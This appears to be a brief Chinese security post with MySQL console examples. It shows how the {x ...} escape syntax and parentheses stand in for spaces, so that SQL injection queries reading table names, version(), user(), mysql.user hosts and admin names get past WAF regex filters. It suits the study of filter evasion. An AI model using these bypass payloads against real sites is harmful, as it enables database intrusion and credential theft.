select{x table_name}from{x information_schema.tables}
mysql> select{x table_name}from{x information_schema.tables}; +----------------------------------------------------+ | table_name | +----------------------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES |
mysql> select{x version()}from{x user}; +---------------+ | {x version()} | +---------------+ | 5.5.20-log | | 5.5.20-log | | 5.5.20-log | | 5.5.20-log | +---------------+ 4 rows in set (0.00 sec)
select{x a}from{x b} . b为当前数据库存在的任意表名。 a就是你要返回的内容。唔 ,我所能想到的场景就是获取user() ,version()之类的 {}代替空格绕过正则的检测啥的。。那我们直接 select{x (user())}或者 select(user())也可以。。
要获取其它信息的话,像这样。
mysql> select{x (select user from user limit 1)} from{x user}; +-------------------------------------+ | {x (select user from user limit 1)} | +-------------------------------------+ | root | | root | | root | | root
mysql> select{x(name)}from{x(manager)}; +--------+ | name | +--------+ | admin | +--------+ 1 row in set (0.00 sec)
可以这样玩,去掉空格
接用圆括号不就好啦!
such as: select(host)from(mysql.user); SELECT(UNHEX(UNHEX(333532453335324533323335)));
直接用括号某些WAF的规则是可以匹配到的
select{x+table_name}from{x(information_schema.tables)}
https://twitter.com/Black2Fan/status/564746640138182656
http://dev.mysql.com/doc/refman/5.6/en/date-and-time-literals.html#date-and-time-standard-sql-literals
http://dev.mysql.com/doc/refman/5.6/en/join.html#idm140714470997024